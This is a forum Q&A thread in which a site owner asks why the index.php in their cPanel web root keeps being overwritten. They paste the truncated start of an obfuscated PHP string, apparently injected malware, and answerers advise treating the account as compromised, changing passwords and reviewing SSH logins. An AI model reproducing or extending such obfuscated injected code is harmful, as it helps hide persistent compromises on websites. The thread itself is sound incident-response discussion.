Question posted in 
In my CPanel under public_html (website root) index.php is overwriting any index.php file with this following code (;_;)
<?php $z1OYQeXkoA='*3wO*bE*3w/*aY*3w,#*3wO*bE*3w/*aY*3w#,*2wT*aI*1wP*bR,#*2wT*aI*1wP*bR#,*1wn*bm*2wn*aR*1w,#*1wn*bm*2wn*aR*1w#,*4wO*bp*1wm*aM*3w,#*4wO*bp*1wm*aM*3w#,*1wX*bq*5wY*aU,#*1wX*bq*5wY*aU#,*4ww*aL*5wL*bV*2w,#*4ww*aL*5wL*bV*2w#,*1wh*bT*4wI*aa,#*1wh*bT*4wI*aa#,*4wM*ba*4wt*ai*4w,#*4wM*ba*4wt*ai*4w#,*4wA*btD*aO*2w,#*4wA*btD*aO*2w#,L*aA*3wQ*bo*2w,#L*aA*3wQ*bo*2w#,*4wV*bAC*a/*2w,#*4wV*bAC*a/*2w#,*4wy*bx*1wo*ak*4w,#*4wy*bx*1wo*ak*4w#,*2ws*aj*5wa*bY*3w,#*2ws*aj*5wa*bY*3w#,*4wj*aN*1wr*bO*4w,#*4wj*aN*1wr*bO*4w#,*5wz*awH*bF*4w,#*5wz*awH*bF*4w#,K*bC*4wa*as,#K*bC*4wa*as#,*2wN*al*4wU*bz*2w,#*2wN*al*4wU*bz*2w#,*3wq*bL*4wJ*aF*1w,#*3wq*bL*4wJ*aF*1w#,*3wp*af*4wj*bu*2w,#*3wp*af*4wj*bu*2w#,*5wF*bZ*1wq*aD,#*5wF*bZ*1wq*aD#,*1wo*bw*4 --like this(*code is too long)
3
Answers
Seems like your server have been compromised. Try to clean the server, change the password (all ftp, cPanel) and try to upload files.
Firstly, I would change all the passwords to your CPanel. It does sound like someone has pwned your server as @delboy1978uk said. I have slightly limited knowledge in CPanel but from what I do know, it doesn’t normally write to files apart from .htaccess and some config files.
If you have SSH access to your server, I would also have a look at the SSH connections that have been successful as that will show you if someone else has had a SSH connection to your server. You will most likely find these here:
I would also advice that you invest in setting up your own VPS for your websites as you will have more control over the server. Granted that shared hosting can take a lot of the pain away, but it can also be a pain to debug issues including this one. You can use something like DigitalOcean Vultr as these are really cheap and have high performance.
If you have no real experience with setting up LAMP or LEMP stacks, you can also use the tutorials on DigitalOcean on how to do this. You can even buy your own copy of CPanel and install it on the server if you are really familiar with CPanel and want to keep the same interface.
I hope this helps and gives you a little more information.
You server/account has been compromised. The immediate solution is to move all your data on another server with strong passwords, use private/public key pair if possible. Also, if you can use a VPS, avoid using cpanel or similar application.
More the time you take to move the files, more it will affect.